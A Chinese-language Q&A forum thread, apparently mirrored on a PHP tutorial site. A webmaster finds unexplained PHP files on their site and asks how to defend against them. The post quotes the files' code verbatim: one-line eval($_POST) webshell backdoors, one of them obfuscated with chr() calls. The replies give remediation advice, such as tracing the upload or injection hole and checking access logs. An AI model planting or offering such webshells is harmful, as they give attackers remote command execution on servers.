ホームページ > バックエンド開発 > PHPチュートリアル > 网站多了几个PHP文件,eval($_POST['1']);

网站多了几个PHP文件,eval($_POST['1']);

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB
リリース: 2016-06-06 20:46:54
オリジナル
2183 人が閲覧しました

网站多了几个PHP,内容如下:eval($_POST['1']);

有的是其他内容, 我百度了一下发现时执行某些命令的,我测试了一下 如果权限没限制好的话 确实可以执行一些命令。 请问 除了设置权限,从代码级别可否做限制呢?有没有什么好办法呢?

还有个PHP文件内容如下:

<?php
$a=range(1,200);$b=chr($a[96]).chr($a[114]).chr($a[114]).chr($a[100]).chr($a[113]).chr($a[115]);
$b(${chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82]).chr($a[83])}[chr($a[51])]);
?>
ログイン後にコピー
ログイン後にコピー

还有文件,名字是:13686921256303.virus_killed
内容是:

<?php eval($_POST[hardqmu7]);?>
ログイン後にコピー
ログイン後にコピー

请各位出出注意,谢谢了。

回复内容:

网站多了几个PHP,内容如下:eval($_POST['1']);

有的是其他内容, 我百度了一下发现时执行某些命令的,我测试了一下 如果权限没限制好的话 确实可以执行一些命令。 请问 除了设置权限,从代码级别可否做限制呢?有没有什么好办法呢?

还有个PHP文件内容如下:

<?php
$a=range(1,200);$b=chr($a[96]).chr($a[114]).chr($a[114]).chr($a[100]).chr($a[113]).chr($a[115]);
$b(${chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82]).chr($a[83])}[chr($a[51])]);
?>
ログイン後にコピー
ログイン後にコピー

还有文件,名字是:13686921256303.virus_killed
内容是:

<?php eval($_POST[hardqmu7]);?>
ログイン後にコピー
ログイン後にコピー

请各位出出注意,谢谢了。

明显的是被上传一句话木马了啊! 可以通过菜刀直接连接的,可以执行很多命令。 修复的话要从根本上修复,看下网站是不是有上传漏洞,sql注入等问题。 可以查看http的访问日志来看利用这个一句话执行了什么操作,排查网站是不是被提权,获取了服务器权限等。

修正要修正根上。

与其费心让病毒代码“不能运行”,倒不如寻找病毒进入的来源——是从PHP程序的漏洞引入的,还是从服务器环境的不安全引入的。

另外提一下,使用虚拟主机在安全性上可能不是一个好主意。因为你与他人分享不隔离的物理设备与LAMP环境,虽然理论上Linux下用户之间的隔离很好,但实际上不隔离开还是风险很高。

这是给开了php后门了

関連ラベル:
php
このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
最新の問題
PHP 拡張子 intl
から 1970-01-01 08:00:00
0
0
0
phpのデータ取得?
から 1970-01-01 08:00:00
0
0
0
PHP GET エラー レポート
から 1970-01-01 08:00:00
0
0
0
phpを上手に学ぶ方法
から 1970-01-01 08:00:00
0
0
0
人気のチュートリアル
詳細>
最新のダウンロード
詳細>
ウェブエフェクト
公式サイト
サイト素材
フロントエンドテンプレート